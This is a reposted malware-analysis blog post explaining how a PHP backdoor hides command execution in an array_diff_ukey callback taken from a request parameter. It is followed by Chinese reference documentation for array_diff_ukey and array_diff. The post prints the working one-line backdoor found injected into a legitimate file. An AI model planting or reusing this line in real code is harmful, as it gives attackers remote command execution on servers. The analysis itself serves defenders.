We often find new techniques employed by malware authors. Some are very interesting, others are pretty funny, and then there are those that really stump us in their creativity and effectiveness. This post is about the latter.
Everyone who writes code in PHP knows what the eval() function is for. It evaluates a string as PHP code. In other words, it executes the code. But there are certainly many other ways to run a code, which are not always so obvious. The most popular and commonly used one is the preg_replace() function.
According to its description, the preg_replace functions “performs a regular expression search and replace.” Unfortunately, when using the “\e”modifier, this function also runs the code. Yes, there are more ways of running the code without using the eval() function. Example could be thecreate_function(), or the assert() function. All these options of running the code makes malware analysis all that more complex a process.
That being said, even with our insights we continue to find ingenious ways that malware authors are employing for their backdoors.
The Backdoor
It started with following line of code injected at the top of a legitimate php file:
@array_diff_ukey(@array((string)$_REQUEST[‘password’]=>1), @array((string)stripslashes($_REQUEST[‘re_password’])=>2),$_REQUEST[‘login’]);
It took me a little while to understand how this could work (and thanks to Ante Kresic for helping me here), but in the end, I realized that the problem is in the callback functions. Can you see why?
The malware author set the callback function to be the variable “login” that is controlled by the attacker. So he can set login to be the system or exec functions, allowing him to execute commands on the server.
Take a look at this example:
Yes, he just ran the “system” command using this technique. And he can execute any other commands he wants on the server, with that 1 line of code. To make matters worse, that little payload was not detected by any anti-virus or security software that we tested.
What’s the Big Deal?
Most security tools and articles online recommend webmasters look for a certain subset of functions that are often used for malicious purposes. Likeeval, preg_replace, base64_decode and a few other combinations. Well, guess what, attackers know that too and look at what they are starting to employ, good functions for bad purposes.
Also, note that they are not just restricted to the array_diff_ukey() function, but any other function that allows for callbacks.
There goes the neighborhood…
转自:http://blog.sucuri.net/2014/04/php-callback-functions-another-way-to-hide-backdoors.html
php-Arrays函数-array_diff_ukey-用回调函数对键名比较计算数组的差集
array_diff_ukey() 函数 用回调函数对键名比较计算数组的差集
【功能】 该函数将返回一个数组,该数组包含了所有在array1中但是不在其他任何参数数组中的键名的值。注意关联关系保持不变。此比较是通过用户提供的回调函数进行的。 如果认为第一个参数小于、等于、或大于第二个参数时,回调函数必须返回 一个小于零、等于零,或大于零的整数 .与 array_diff() 不同的是,比较是根据键名而不是值来进行的。
【使用范围】 php5 > 5.1.0
【使用】 array array_diff_ukey( array array1, array array2[,array…,callback key_compare_func] )
array1/必需/数组1 ;array2/必需/比较的数组 最少得有一个; array…/可选/用来比较的数组 ;key_compare_func…/必需/为用户提供作为比较标准的回调函数
【示例】
//定义回调函数
function key_compare_func( $key1, $key2 )
{
if( $key1 == $key2 )
return 0;
else if( $key1 > $key2 )
return 1;
else
return -1;
}
//分别定义两个数组
$array1 = array( "blue" => 1, "red" => 2, "green" => 3,"purple" => 4 );
$array2 = array( "green" => 5, "blue" => 6, "yellow" => 7,"cyan" => 8 );
print_r( array_diff_ukey( $array1, $array2, "key_compare_func" ) );
/*
Array
(
[red] => 2
[purple] => 4
)*/
PHP array_diff() 函数
定义和用法
array_diff() 函数返回两个数组的差集数组。该数组包括了所有在被比较的数组中,但是不在任何其他参数数组中的键值。
在返回的数组中,键名保持不变。
语法
array_diff(array1,array2,array3...)
| 参数 | 描述 |
|---|---|
| array1 | 必需。与其他数组进行比较的第一个数组。 |
| array2 | 必需。与第一个数组进行比较的数组。 |
| array3 | 可选。与第一个数组进行比较的数组。 |
提示和注释
提示:可用一个或任意多个数组与第一个数组进行比较。
注释:仅有值用于比较。
例子
<?php $a1=array(0=>"Cat",1=>"Dog",2=>"Horse"); $a2=array(3=>"Horse",4=>"Dog",5=>"Fish"); print_r(array_diff($a1,$a2)); ?>
输出:
Array ( [0] => Cat )
转载请注明:jinglingshu的博客 » PHP Callback Functions: Another Way to Hide Backdoors